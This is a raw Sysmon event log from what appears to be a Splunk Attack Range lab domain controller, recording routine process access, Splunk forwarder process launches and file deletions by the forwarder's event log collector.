07:49:51.348{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047886Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:51.348{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047885Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:51.348{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047884Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:51.348{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047883Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:51.348{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F41F-60EB-177D-00000000CF01}4072C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001047882Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:51.332{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F41F-60EB-177D-00000000CF01}4072C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001047881Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:51.334{466BC892-F41F-60EB-177D-00000000CF01}4072C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001047880Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:51.200{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=35798E96A423142F9BC2AB053AC74EE1,SHA256=5C1E958B4EB8F4B21197E7F264A863DACC34DA5526353BE26CD3D6B2F0167A9C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047879Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:51.199{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=71CAD346828D8FC4430FE3D1E1023B9C,SHA256=92CED77414B02D147A8DF9AF9E06AE42171D940E6BE152AF619631097D8D4294,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047909Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:52.864{466BC892-F420-60EB-197D-00000000CF01}764010232C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047908Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:52.648{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F420-60EB-197D-00000000CF01}7640C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047907Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:52.648{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047906Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:52.648{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047905Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:52.648{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047904Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:52.648{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047903Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:52.648{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F420-60EB-197D-00000000CF01}7640C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001047902Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:52.648{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F420-60EB-197D-00000000CF01}7640C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001047901Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:52.634{466BC892-F420-60EB-197D-00000000CF01}7640C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001047900Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:52.564{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEB10CF6A46D72EBED293B38ECD1AB7C,SHA256=1C20E5B035DC38080B46021F8A1B113B3ECC002F8D4598FE2051995008414F0E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807124Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:52.241{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A8A1525016DF6A1185E82FC35814171,SHA256=46FB6EECFA4B027445F6D79EF0EC56C3FDF9451171820CB8E14E1C7DD9A5B145,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047899Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:52.333{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=35798E96A423142F9BC2AB053AC74EE1,SHA256=5C1E958B4EB8F4B21197E7F264A863DACC34DA5526353BE26CD3D6B2F0167A9C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047898Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:52.048{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F420-60EB-187D-00000000CF01}6396C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047897Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:52.048{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047896Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:52.048{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047895Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:52.048{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047894Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:52.048{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047893Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:52.048{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F420-60EB-187D-00000000CF01}6396C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001047892Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:52.032{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F420-60EB-187D-00000000CF01}6396C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001047891Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:52.033{466BC892-F420-60EB-187D-00000000CF01}6396C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001047920Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:53.663{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C27A66AA804812337652AA30E4BAC983,SHA256=C420D3E2825BABB6A87F0255B39081934C11C316456F0CBE339A92075016A566,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047919Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:53.600{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F68937F6A2317FDB195629E3D9D442D,SHA256=5167DF441F2E07E610FC63DE36ADD090E38B6B7F5F2C6855262AC6B133675BAF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807125Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:53.241{0C1E0330-0518-60E8-D300-00000000D001}380NT 